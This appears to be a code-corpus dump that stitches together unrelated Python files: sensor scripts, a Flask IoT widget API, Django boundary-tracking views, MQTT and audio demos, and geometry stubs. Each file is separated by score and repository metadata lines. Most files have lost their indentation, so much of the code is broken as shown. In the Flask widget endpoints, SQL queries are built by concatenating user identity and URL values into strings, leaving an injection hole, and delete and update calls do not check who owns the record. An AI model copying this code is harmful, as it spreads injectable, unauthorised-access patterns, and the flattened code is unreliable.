from pypipet.core.project_context import PipetContext
from sqlalchemy.exc import OperationalError
import os
class TestProjectInit:
def test_init_project(self):
ctx = PipetContext()
ctx.start_project('test')
assert ctx.root is not None
def test_start_project(self):
ctx = PipetContext()
ctx.start_project('test')
setting_file = ctx.root + 'setting.yaml'
        assert os.path.isfile(setting_file)
ctx.initialize_project(config_file=setting_file)
assert ctx.config is not None
assert ctx.db_config is not None
assert ctx.config.get('file_template') is not None
assert ctx.engine is not None
assert ctx.get_session_maker() is not None
ctx.set_log_level('debug')
assert ctx.log_level is not None
ctx.import_static_data()
| 2.21875
| 2
|
videodatabase.py
|
nsdown/Facebook-Video-Uploader
| 4
|
12777999
|
<filename>videodatabase.py
## this example uses sqlite
#Download sqlite browser app for dealing with your database here:
#http://sqlitebrowser.org/
#from peewee import *
import peewee
db = peewee.SqliteDatabase('VideoUploads.db')
class Video(peewee.Model):
vid_url = peewee.CharField(max_length=4096)
class Meta:
database = db # This model uses the "people.db" database.
def addVideo(vid_url):
vid = Video(vid_url=vid_url)
vid.save()
print "Added video", vid_url
def videoExists(vid_url):
try:
return Video.get(Video.vid_url == vid_url)
except Video.DoesNotExist:
return False
# Only create the tables if they do not exist.
db.create_tables([Video], safe=True)
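# Minimal usage sketch (assumption, not part of the original file): guard
# against inserting the same URL twice; the URL below is illustrative only.
# url = 'https://example.com/video.mp4'
# if not videoExists(url):
#     addVideo(url)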
| 3.34375
| 3
|
bme280_test.py
|
Kuzj/Python_BME280
| 1
|
12778000
|
<gh_stars>1-10
#!/usr/bin/env python
from Adafruit_BME280 import BME280
from time import sleep
DELAY_BETWEEN_SENSORS = 1
SPI_BUS = 0
for j in range(20):
for i in [1,2,3,4,5]:
bme280SensorInstance = BME280(spi_bus=SPI_BUS,spi_dev=i, speed_hz = 13)#, delay_usec = 10000)
if bme280SensorInstance.sample_ok:
print(f'sensor {SPI_BUS}.{i}')
print(f't = {round(bme280SensorInstance.temperature,1)}')
print(f'h = {round(bme280SensorInstance.humidity,1)}')
print(f'p = {round(bme280SensorInstance.pressure,1)}')
sleep(DELAY_BETWEEN_SENSORS)
print('-'*30)
print('+'*30)
| 2.875
| 3
|
src/examples/reference/mousemoved.py
|
agarwalnaimish/pyprocessing
| 3
|
12778001
|
<filename>src/examples/reference/mousemoved.py
from pyprocessing import *
# Move your mouse across the
# image to change the value of the rectangle
value = 0;
def draw():
fill(value);
rect(25, 25, 50, 50);
def mouseMoved():
global value
value = value + 5;
if (value > 255):
value = 0;
run()
| 3.140625
| 3
|
app/controllers/user/widget.py
|
meongbego/IOT_ADRINI
| 1
|
12778002
|
<gh_stars>1-10
from flask_restful import Resource, reqparse, fields
from app.helpers.rest import *
from app.helpers.memcache import *
from app.models import model as db
from app import db as dbq
from app.middlewares.auth import login_required, get_jwt_identity
class WidgetResource(Resource):
@login_required
def get(self):
obj_userdata = list()
id_userdata = str(get_jwt_identity())
column = db.get_columns('v_widget')
try:
results = list()
query = "select * from v_widget where id_userdata='"+id_userdata+"'"
dbq.execute(query)
rows = dbq.fetchall()
for row in rows:
print(row)
results.append(dict(zip(column, row)))
except Exception as e:
return response(401, message=str(e))
else:
for i in results :
data = {
"id_widget": str(i['id_widget']),
"nm_widget" : i['nm_widget'],
"id_channels": str(i['id_channels'])
}
obj_userdata.append(data)
return response(200, data=obj_userdata)
class WidgetResourceById(Resource):
@login_required
def get(self, id_widget):
obj_userdata = list()
id_userdata = str(get_jwt_identity())
column = db.get_columns('v_widget')
try:
results = list()
query = "select * from v_widget where id_userdata='"+id_userdata+"' and id_widget='"+id_widget+"'"
dbq.execute(query)
rows = dbq.fetchall()
for row in rows:
print(row)
results.append(dict(zip(column, row)))
except Exception as e:
return response(401, message=str(e))
else:
for i in results :
data = {
"id_widget": str(i['id_widget']),
"nm_widget" : i['nm_widget'],
"id_channels": str(i['id_channels'])
}
obj_userdata.append(data)
return response(200, data=obj_userdata)
class WidgetInsert(Resource):
@login_required
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('nm_widget', type=str, required=True)
parser.add_argument('id_channels', type=str, required=True)
args = parser.parse_args()
data_insert = {
"nm_widget" : args['nm_widget'],
"id_channels" : args['id_channels'],
}
try:
result = db.insert(table="tb_widget", data=data_insert)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
return response(200, message=message)
else:
respon = {
"data": data_insert,
"id" : result
}
return response(200, data=respon)
class WidgetRemove(Resource):
@login_required
def delete(self, id_widget):
try:
db.delete(
table="tb_widget",
                field='id_widget',
value=id_widget
)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
else:
message = "removing"
finally:
return response(200, message=message)
class WidgetUpdate(Resource):
@login_required
def put(self, id_widget):
parser = reqparse.RequestParser()
        parser.add_argument('nm_widget', type=str, required=True)
        parser.add_argument('id_channels', type=str, required=True)
        args = parser.parse_args()
data = {
"where":{
"id_widget": id_widget
},
"data":{
"nm_widget" : args['nm_widget'],
"id_channels" : args['id_channels'],
}
}
try:
db.update("tb_widget", data=data)
except Exception as e:
message = {
"status": False,
"error": str(e)
}
else:
message = {
"status": True,
"data": data
}
finally:
return response(200, message=message)
| 2.4375
| 2
|
python/sub-temp.py
|
robertrongen/smartys-rpi
| 0
|
12778003
|
<reponame>robertrongen/smartys-rpi<gh_stars>0
import time
import datetime
import paho.mqtt.client as mqtt
import fourletterphat as flp
import signal
import buttonshim
# set max temperature
maxtemp = 30
# Define event handlers
def on_connect(mqtt_client, obj, flags, rc):
mqtt_client.subscribe("smartys1/temp")
print("Connected")
def on_message(mqtt_client, obj, msg):
message = msg.payload.decode()
temp = float(message) # + 100
print("Topic: "+msg.topic+" Payload: "+message)
print(datetime.datetime.now())
flp.print_str(message)
flp.show()
# set LED color based on temperature and max temperature
if temp < (maxtemp - 2):
print("green")
buttonshim.set_pixel(0x00, 0xff, 0x00) #GREEN
elif temp > maxtemp:
print("red")
buttonshim.set_pixel(0xff, 0x00, 0x00) #RED
else:
print("yellow")
buttonshim.set_pixel(0xff, 0xff, 0x00) #YELLOW
print("Subscribing to EnviroPhat temperature via MQTT on broker.hivemq.com with topic smartie1/temp (CTRL-C to exit)")
mqtt_client = mqtt.Client("", True, None, mqtt.MQTTv31)
mqtt_client.on_connect = on_connect
mqtt_client.on_message = on_message
mqtt_client.connect("broker.hivemq.com", 1883, 60)
mqtt_client.loop_forever()
| 2.84375
| 3
|
gifts_rest/router.py
|
brjones/gifts_rest
| 0
|
12778004
|
<filename>gifts_rest/router.py
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class GiftsRouter(object):
"""
This is for use when there are multiple databases and deciding on which of
the dbs should be searched
"""
def db_for_read(self, model, **hints):
"Point all operations on restui models to 'gifts'"
if model._meta.app_label == 'restui':
return 'gifts'
return 'default'
def db_for_write(self, model, **hints):
"Point all operations on restui models to 'gifts'"
if model._meta.app_label == 'restui':
return 'gifts'
return 'default'
def allow_relation(self, obj1, obj2, **hints):
"Allow any relation if a both models in restui app"
if obj1._meta.app_label == 'restui' and obj2._meta.app_label == 'restui':
return True
        # Allow the relation if neither model belongs to the restui app
elif 'restui' not in [obj1._meta.app_label, obj2._meta.app_label]:
return True
return False
def allow_syncdb(self, db, model):
if db == 'gifts' or model._meta.app_label == "restui":
return False # we're not using syncdb on our legacy database
else: # but all other models/databases are fine
return True
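# Minimal configuration sketch (assumption, not part of the original file):
# the router is activated from the Django settings module, e.g.
# DATABASE_ROUTERS = ['gifts_rest.router.GiftsRouter']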
| 1.992188
| 2
|
Scripts/Search.py
|
TheGreymanShow/House.Viz
| 0
|
12778005
|
<filename>Scripts/Search.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
print("Welcome to House.Viz")
print("Please select your budget range :")
print("1. $50000-$100000")
print("2. $100000-$200000")
print("3. $200000-$300000")
print("4. $300000-$400000")
print("5. $400000-$500000")
print("6. $500000-$600000")
print("7. $600000-$700000")
print("8. $700000-$800000")
print("9. $800000-$900000")
print("10. $900000-$1000000")
print("11. $1000000-$1500000")
print("12. $1500000-$5000000")
print("13. $5000000-$7750000")
price = input()
price=int(price)
#pritn("price="+str())
print("Please select your desized house area:")
print("1. 300 - 1000 sq.ft")
print("2. 1000 - 1500 sq.ft")
print("3. 1500 - 2000 sq.ft")
print("4. 2000 - 2500 sq.ft")
print("5. 2500 - 3000 sq.ft")
print("6. 3000 - 4000 sq.ft")
print("7. 4000 - 5000 sq.ft")
print("8. 5000 - 6000 sq.ft")
print("9. 6000 - 7000 sq.ft")
print("10. 7000+ sq.ft")
area = input()
area=int(area)
print("How much are you willing to walk ?")
print("1.500 meters")
print("2.1000 meters")
distance = input()
distance = int(distance)
if price == 1:
print("yes")
minp=50000
maxp=100000
elif price==2:
minp=100000
maxp=200000
elif price==3:
minp=200000
maxp=300000
elif price==4:
minp=300000
maxp=400000
elif price==5:
minp=400000
maxp=500000
elif price==6:
minp=500000
maxp=600000
elif price==7:
minp=600000
maxp=700000
elif price==8:
minp=700000
maxp=800000
elif price==9:
minp=800000
maxp=900000
elif price==10:
minp=900000
maxp=1000000
elif price==11:
minp=1000000
maxp=1500000
elif price==12:
minp=1500000
maxp=5000000
elif price==13:
minp=5000000
maxp=7750000
if area==1:
mina=300
maxa=1000
elif area==2:
mina=1000
maxa=1500
elif area==3:
mina=1500
maxa=2000
elif area==4:
mina=2000
maxa=2500
elif area==5:
mina=2500
maxa=3000
elif area==6:
mina=3000
maxa=4000
elif area==7:
mina=4000
maxa=5000
elif area==8:
mina=5000
maxa=6000
elif area==9:
mina=6000
maxa=7000
elif area==10:
mina=7000
maxa=15000
dataset = pd.read_csv("C:/Users/admin/Desktop/Stevens Internship 2017/Datasets/Final/final_plotset.csv")
count=0
for index,row in dataset.iterrows():
area=row["LAND.SQUARE.FEET"]
price=row["SALE.PRICE"]
if price>minp and price<maxp:
if area>mina and area<maxa:
count+=1
print("Yay! We've found "+str(count)+" houses that fit your needs")
| 3.78125
| 4
|
release/stubs.min/Rhino/Geometry/__init___parts/Ellipse.py
|
YKato521/ironpython-stubs
| 0
|
12778006
|
<reponame>YKato521/ironpython-stubs
class Ellipse(object, IEpsilonComparable[Ellipse]):
"""
Represents the values of a plane and the two semiaxes radii in an ellipse.
Ellipse(plane: Plane,radius1: float,radius2: float)
Ellipse(center: Point3d,second: Point3d,third: Point3d)
"""
def EpsilonEquals(self, other, epsilon):
"""
EpsilonEquals(self: Ellipse,other: Ellipse,epsilon: float) -> bool
Check that all values in other are within epsilon of the values in this
"""
pass
def ToNurbsCurve(self):
"""
ToNurbsCurve(self: Ellipse) -> NurbsCurve
Constructs a nurbs curve representation of this ellipse.
This is equivalent to
calling NurbsCurve.CreateFromEllipse().
Returns: A nurbs curve representation of this ellipse or null if no such representation could be made.
"""
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self, *__args):
"""
__new__[Ellipse]() -> Ellipse
__new__(cls: type,plane: Plane,radius1: float,radius2: float)
__new__(cls: type,center: Point3d,second: Point3d,third: Point3d)
"""
pass
def __reduce_ex__(self, *args):
pass
def __repr__(self, *args):
""" __repr__(self: object) -> str """
pass
def __str__(self, *args):
pass
Plane = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the base plane of the ellipse.
Get: Plane(self: Ellipse) -> Plane
Set: Plane(self: Ellipse)=value
"""
Radius1 = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the radius of the ellipse along the base plane X semiaxis.
Get: Radius1(self: Ellipse) -> float
Set: Radius1(self: Ellipse)=value
"""
Radius2 = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the radius of the ellipse along the base plane Y semiaxis.
Get: Radius2(self: Ellipse) -> float
Set: Radius2(self: Ellipse)=value
"""
| 3.375
| 3
|
solutions/StringSplitAndJoin.py
|
kaleliguray/python_hackerRank_solution
| 0
|
12778007
|
<gh_stars>0
def split_and_join(line):
# write your code here
tempString = line.split(" ")
print("Split version : ",tempString)
tempString = "-".join(tempString)
print("Join version : ",tempString)
return tempString
if __name__ == '__main__':
line = input()
result = split_and_join(line)
print(result)
| 3.546875
| 4
|
src/bdbd/src/bdbd/test/audio.py
|
rkent/BDBD
| 0
|
12778008
|
<reponame>rkent/BDBD<gh_stars>0
# demo of generation of wav file, manipulation with pydub, and playing through speakers
import espeakng
import pyaudio
import wave
import pydub
import sys
import io
import logging
logging.basicConfig(level='INFO')
log = logging.getLogger(__name__)
log.info('test of logging')
p = pyaudio.PyAudio()
#for i in range(p.get_device_count()):
# print(p.get_device_info_by_index(i))
es = espeakng.ESpeakNG(voice='en-gb-x-gbclan')
wav = es.synth_wav('Hello')
wavFile = io.BytesIO(wav)
originalSegment = pydub.AudioSegment.from_file(wavFile)
changedSegment = originalSegment.apply_gain(-12.)
changedFile = io.BytesIO()
changedSegment.export(changedFile, 'wav')
#wavFile = 'e02-16kHz.wav'
chunk = 4096
changedFile.seek(0)
wf = wave.open(changedFile)
channels=wf.getnchannels()
rate=wf.getframerate()
print(channels, rate)
if True:
stream = p.open(
format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
#output_device_index=11,
output=True
)
data = wf.readframes(chunk)
while len(data):
print('writing data')
stream.write(data)
data = wf.readframes(chunk)
stream.close()
p.terminate()
| 2.75
| 3
|
books/modernvim/bubba.py
|
argodev/learn
| 0
|
12778009
|
def mytest():
print('hello')
| 0.972656
| 1
|
examples/pseudo_bayesian/pb_exp_decay.py
|
KennedyPutraKusumo/py-DED
| 2
|
12778010
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
return np.array([
np.exp(model_parameters[0] * ti_controls[0])
])
designer = Designer()
designer.simulate = simulate
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
The pseudo-bayesian type does not really matter in this case because only a single model
parameter is involved, i.e., the information is a scalar, so every criterion becomes
equivalent to the information matrix itself.
"""
pb_type = 0
# pb_type = 1
designer.design_experiment(
designer.d_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.a_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.e_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
| 2.4375
| 2
|
exabel_data_sdk/scripts/load_entities_from_csv.py
|
Exabel/python-sdk
| 1
|
12778011
|
import argparse
import sys
from typing import Sequence
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.client.api.bulk_insert import BulkInsertFailedError
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.scripts.csv_script import CsvScript
from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name
class LoadEntitiesFromCsv(CsvScript):
"""
Processes a CSV file with entities and creates them in the Exabel API.
The CSV file should have a header line specifying the column names.
The command line argument --name-column specifies the column from which to read
the entity names. The entity names are automatically normalized to create a valid
resource name for the entity.
For instance, if the entity type is "brand", and the namespace is "acme", and the entity name
is "<NAME>", the generated resource name will be:
entityTypes/brand/entities/acme.Spring_Vine
Optionally, another column may specify a display name for the entity, and another column
may give a description for the entity.
"""
def __init__(self, argv: Sequence[str], description: str):
super().__init__(argv, description)
self.parser.add_argument(
"--entity-type",
required=False,
type=str,
help="The type of the entities to be loaded. Must already exist in the data model. "
"If not specified, defaults to the same value as the name_column argument.",
)
self.parser.add_argument(
"--name-column",
required=False,
type=str,
help="The column name for the entity name. "
"If not specified, defaults to the first column in the file.",
)
self.parser.add_argument(
"--display-name-column",
required=False,
type=str,
help="The column name for the entity's display name. "
"If not specified, uses the entity name",
)
self.parser.add_argument(
"--description-column",
required=False,
type=str,
help="The column name for the entity description. "
"If not specified, no description is provided.",
)
def run_script(self, client: ExabelClient, args: argparse.Namespace) -> None:
if args.dry_run:
print("Running dry-run...")
print("Loading entities from", args.filename)
name_col_ref = args.name_column or 0
string_columns = {
name_col_ref,
args.display_name_column or name_col_ref,
}
if args.description_column:
string_columns.add(args.description_column)
entities_df = self.read_csv(args, string_columns=string_columns)
name_col = args.name_column or entities_df.columns[0]
display_name_col = args.display_name_column or name_col
description_col = args.description_column
entity_type_name = f"entityTypes/{args.entity_type or name_col}"
entity_type = client.entity_api.get_entity_type(entity_type_name)
if not entity_type:
print("Failure: Did not find entity type", entity_type_name)
print("Available entity types are:")
print(client.entity_api.list_entity_types())
sys.exit(1)
entities = [
Entity(
name=f"{entity_type_name}/entities/{args.namespace}."
f"{normalize_resource_name(row[name_col])}",
display_name=row[display_name_col],
description=row[description_col] if description_col else "",
)
for _, row in entities_df.iterrows()
]
if args.dry_run:
print("Loading", len(entities), "entities")
print(entities)
return
try:
client.entity_api.bulk_create_entities(entities, entity_type_name, threads=args.threads)
except BulkInsertFailedError:
# An error summary has already been printed.
pass
if __name__ == "__main__":
LoadEntitiesFromCsv(sys.argv, "Upload entities file.").run()
| 2.484375
| 2
|
changeManager/views.py
|
karimbahgat/gbTracker_site
| 0
|
12778012
|
from django.http.response import HttpResponse
from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.forms.models import fields_for_model, model_to_dict
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from . import models
from . import forms
import json
# Create your views here.
def overview(request):
if request.method == 'GET':
context = {'names':request.GET['names'].split('|')}
return render(request, 'overview.html', context)
def source(request, pk):
'''View of a source'''
src = models.BoundarySource.objects.get(pk=pk)
toplevel_refs = src.boundary_refs.filter(parent=None)
context = {'source':src, 'toplevel_refs':toplevel_refs}
print('typ',src,repr(src.type))
if src.type == 'TextSource':
return render(request, 'source_text.html', context)
elif src.type == 'DataSource':
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context['import_params'] = import_params
return render(request, 'source_data.html', context)
elif src.type == 'MapSource':
levels = src.boundary_refs.all().values_list('level').distinct()
levels = [lvl[0] for lvl in levels]
context['levels'] = sorted(levels)
return render(request, 'source_map.html', context)
def datasource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'DataSource'})
context = {'form': form}
return render(request, 'source_data_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
# save importer
from dataImporter.models import DataImporter
import_params = json.loads(data['import_params'])
importer = DataImporter(source=source, import_params=import_params)
importer.save()
return redirect('source', source.pk)
else:
return render(request, 'source_data_add.html', {'form':form})
def mapsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'MapSource'})
context = {'form': form}
return render(request, 'source_map_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_map_add.html', {'form':form})
def textsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'TextSource'})
context = {'form': form}
return render(request, 'source_text_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_text_add.html', {'form':form})
def datasource_edit(request, pk):
'''Edit of a data source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context = {'form': form, 'import_params': import_params}
return render(request, 'source_data_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
# save importer
importer = src.importer
importer.import_params = json.loads(data['import_params'])
importer.save()
return redirect('source', src.pk)
else:
return render(request, 'source_data_edit.html', {'form':form})
def mapsource_edit(request, pk):
'''Edit of a map source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_map_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_map_edit.html', {'form':form})
def textsource_edit(request, pk):
'''Edit of a text source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_text_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_text_edit.html', {'form':form})
def boundary(request, pk):
'''View of a boundary ref instance.'''
ref = models.BoundaryReference.objects.get(pk=pk)
# main snapshot
snap = ref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
main_geoj = {'type':'Feature', 'geometry':geom}
main_geoj = json.dumps(main_geoj)
else:
main_geoj = 'null'
# hierarchy snapshots
subrefs = ref.children.all()
if subrefs:
hier_geoj = {'type':'FeatureCollection', 'features':[]}
for subref in subrefs:
snap = subref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
feat = {'type':'Feature', 'geometry':geom}
hier_geoj['features'].append(feat)
hier_geoj = json.dumps(hier_geoj)
else:
hier_geoj = 'null'
context = {'boundary_ref':ref,
'main_geojson':main_geoj,
'hier_geojson':hier_geoj,
}
return render(request, 'boundaryref.html', context)
'''
def snapshot(request, pk):
#''View of a snapshot instance.''
snap = models.BoundarySnapshot.objects.get(pk=pk)
geom = snap.geom.__geo_interface__
geoj = {'type':'Feature', 'geometry':geom}
# find matching snapshots
ref_matches = _match_boundary_ref(snap.boundary_ref)
snapshot_matches = models.BoundarySnapshot.objects.filter(boundary_ref__in=ref_matches) | models.BoundarySnapshot.objects.filter(boundary_ref__parent__in=ref_matches)
from datetime import date
date_starts = [s.event.date_start for s in snapshot_matches]
date_ends = [s.event.date_end for s in snapshot_matches]
mindate_num = date.fromisoformat(min(date_starts)).toordinal()
maxdate_num = date.fromisoformat(max(date_ends)).toordinal()
date_start = date.fromisoformat(snap.event.date_start).toordinal()
date_end = date.fromisoformat(snap.event.date_end).toordinal()
for s in snapshot_matches:
start = date.fromisoformat(s.event.date_start).toordinal()
end = date.fromisoformat(s.event.date_end).toordinal()
s.date_start_perc = (start - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_end_perc = (end - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_dur_perc = s.date_end_perc - s.date_start_perc
mid = (start + end) / 2.0
s.date_dist = min(abs(date_start-mid), abs(date_end-mid))
key = lambda s: s.date_dist
snapshot_matches = sorted(snapshot_matches, key=key)
ticks = []
numticks = 5
incr = (maxdate_num - mindate_num) / (numticks-1)
cur = mindate_num
while cur <= maxdate_num:
print(cur)
perc = (cur - mindate_num) / (maxdate_num - mindate_num) * 100
ticks.append({'label':date.fromordinal(int(cur)), 'percent':perc})
cur += incr
print(ticks)
context = {'snapshot':snap, 'geojson':json.dumps(geoj),
'snapshot_matches':snapshot_matches,
'mindate':min(date_starts), 'maxdate':max(date_ends),
'ticks':ticks}
return render(request, 'snapshot.html', context)
'''
# API
def _match_boundary_ref(match_ref):
parents = match_ref.get_all_parents()
parent_names = [p.names.first().name for p in parents]
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in parent_names if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
ref_scores[ref.id] = score
# get any snapshot belonging to the matched refs or its immediate parent
matches = sorted(refs, key=lambda r: max([ref_scores.get(par.id,0) for par in r.get_all_parents()]), reverse=True)
return matches
def _parse_date(dateval):
'''Can be a year, year-month, or year-month-day'''
if '/' in dateval:
# from and to datestrings
fromdate,todate = dateval.split('/')
fromdate,todate = fromdate.strip(),todate.strip()
if fromdate and todate:
start1,end1 = _parse_date(fromdate)
start2,end2 = _parse_date(todate)
return min(start1,start2), max(end1,end2)
elif fromdate:
start,end = _parse_date(fromdate)
return start,None
elif todate:
start,end = _parse_date(todate)
return None,end
else:
# single date string
dateparts = dateval.split('-')
if len(dateparts) == 1:
yr = dateparts[0]
start = '{}-01-01'.format(yr)
end = '{}-12-31'.format(yr)
elif len(dateparts) == 2:
yr,mn = dateparts
start = '{}-{}-01'.format(yr,mn)
end = '{}-{}-31'.format(yr,mn)
elif len(dateparts) == 3:
start = end = dateval
else:
raise Exception('"{}" is not a valid date'.format(dateval))
return start,end
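# Examples derived from the branches above (not in the original file):
#   _parse_date('1991')      -> ('1991-01-01', '1991-12-31')
#   _parse_date('1991-06')   -> ('1991-06-01', '1991-06-31')  # day is always padded to 31
#   _parse_date('1990/2000') -> ('1990-01-01', '2000-12-31')
#   _parse_date('1990/')     -> ('1990-01-01', None)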
def api_snapshots(request):
if request.method == 'GET':
ids = request.GET['ids']
ids = ids.split(',')
ids = list(map(int, ids))
snaps = models.BoundarySnapshot.objects.filter(pk__in=ids)
feats = []
for snap in snaps:
geom = snap.geom.__geo_interface__
names = [n.name for n in snap.boundary_ref.names.all()]
props = {'names':names}
feat = {'type': 'Feature', 'properties': props, 'geometry':geom}
feats.append(feat)
coll = {'type': 'FeatureCollection', 'features': feats}
return JsonResponse(coll)
@csrf_exempt
def api_boundary(request, pk):
if request.method == 'GET':
ref = models.BoundaryReference.objects.get(pk=pk)
# serialize
data = ref.serialize()
# return as json
resp = JsonResponse(data)
return resp
@csrf_exempt
def api_boundaries(request):
if request.method == 'GET':
# get one or more snapshots based on params
print(request.GET)
ids = request.GET.get('ids', None)
search = request.GET.get('search', None)
search_thresh = request.GET.get('search_thresh', None)
datesearch = request.GET.get('date', None)
if ids:
ids = [int(x) for x in ids.split(',')]
refs = models.BoundaryReference.objects.filter(pk__in=ids)
count = refs.count()
elif search:
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in search.split(',') if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
_ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
_ref_scores[ref.id] = score
# get any reference belonging to the matched refs or its immediate parent
kwargs = {}
if datesearch:
start,end = _parse_date(datesearch)
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(pk__in=refs, **kwargs) | models.BoundaryReference.objects.filter(parent__pk__in=refs, **kwargs)
# calc final ref scores
ref_scores = {}
for ref in refs:
score = max([_ref_scores.get(par.id,0) for par in ref.get_all_parents()])
ref_scores[ref.id] = score
# sort
refs = sorted(refs, key=lambda ref: ref_scores[ref.id], reverse=True)
# filter by threshold
if search_thresh:
refs = [ref for ref in refs
if ref_scores[ref.id] >= float(search_thresh)]
count = len(refs)
else:
# no name filtering
if datesearch:
# filter by date
start,end = _parse_date(datesearch)
kwargs = {}
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(**kwargs)
else:
# get all snapshots
refs = models.BoundaryReference.objects.all()
count = refs.count()
# paginate (for now just return first X)
refs = refs[:100]
# serialize
if search:
results = [{'object':m.serialize(), 'match_score':ref_scores[m.id] * 100,
}
for m in refs]
else:
results = [{'object':m.serialize()} for m in refs]
# add min/max dates for which snapshots are available, or none
for item in results:
starts = [s['event']['date_start'] for s in item['object']['snapshots']]
ends = [s['event']['date_end'] for s in item['object']['snapshots']]
item['date_start'] = min(starts) if starts else None
            item['date_end'] = max(ends) if ends else None
# format results
data = {'count':count, 'results':results}
# return as json
resp = JsonResponse(data)
return resp
    elif request.method == 'POST':
        # submit a new snapshot (not implemented yet)
        return HttpResponse(status=501)
    elif request.method == 'PUT':
        # update an individual snapshot (not implemented yet)
        return HttpResponse(status=501)
